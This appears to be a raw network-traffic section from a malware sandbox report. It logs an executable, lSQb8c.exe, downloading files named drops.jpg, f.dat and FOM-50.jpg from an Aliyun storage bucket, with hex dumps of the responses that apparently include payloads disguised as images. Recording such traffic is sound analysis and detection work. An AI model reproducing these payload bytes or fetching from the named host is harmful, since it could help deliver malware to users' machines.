                                                  2025-01-07 08:59:44 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                  Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                  2025-01-07 08:59:44 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                                                  Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                                  2025-01-07 08:59:44 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                                                  Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.549984118.178.60.94436680C:\Users\user\Documents\lSQb8c.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-07 08:59:58 UTC114OUTGET /drops.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-07 08:59:59 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Tue, 07 Jan 2025 08:59:59 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 37274
                                                  Connection: close
                                                  x-oss-request-id: 677CED0FF947FB3932F3BAD6
                                                  Accept-Ranges: bytes
                                                  ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                  Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 9193697774326766004
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                  x-oss-server-time: 11
                                                  2025-01-07 08:59:59 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                  Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                  2025-01-07 08:59:59 UTC4096INData Raw: 83 b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11
                                                  Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                  2025-01-07 08:59:59 UTC4096INData Raw: eb d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c
                                                  Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                  2025-01-07 08:59:59 UTC4096INData Raw: f9 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89
                                                  Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw9
                                                  2025-01-07 08:59:59 UTC4096INData Raw: 1d 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14
                                                  Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAq
                                                  2025-01-07 08:59:59 UTC4096INData Raw: b2 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77
                                                  Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                  2025-01-07 08:59:59 UTC4096INData Raw: 7d 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f
                                                  Data Ascii: }ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                  2025-01-07 08:59:59 UTC4096INData Raw: 7d 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be
                                                  Data Ascii: }t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~
                                                  2025-01-07 08:59:59 UTC4096INData Raw: 39 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f
                                                  Data Ascii: 9:^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                  2025-01-07 08:59:59 UTC956INData Raw: b0 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37
                                                  Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.549985118.178.60.94436680C:\Users\user\Documents\lSQb8c.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-07 09:00:02 UTC110OUTGET /f.dat HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-07 09:00:03 UTC558INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Tue, 07 Jan 2025 09:00:02 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 879
                                                  Connection: close
                                                  x-oss-request-id: 677CED12482D3739339500C0
                                                  Accept-Ranges: bytes
                                                  ETag: "E54C4296F011EC91D935AA353C936E34"
                                                  Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 11142793972884948456
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000113
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                  x-oss-server-time: 6
                                                  2025-01-07 09:00:03 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                  Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.549986118.178.60.94436680C:\Users\user\Documents\lSQb8c.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-07 09:00:04 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-07 09:00:05 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Tue, 07 Jan 2025 09:00:04 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 55085
                                                  Connection: close
                                                  x-oss-request-id: 677CED146E537B383938C82C
                                                  Accept-Ranges: bytes
                                                  ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                  Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 12339968747348072397
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                  x-oss-server-time: 8
                                                  2025-01-07 09:00:05 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                  Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                  2025-01-07 09:00:05 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                  Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                  2025-01-07 09:00:05 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                  Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                  2025-01-07 09:00:05 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 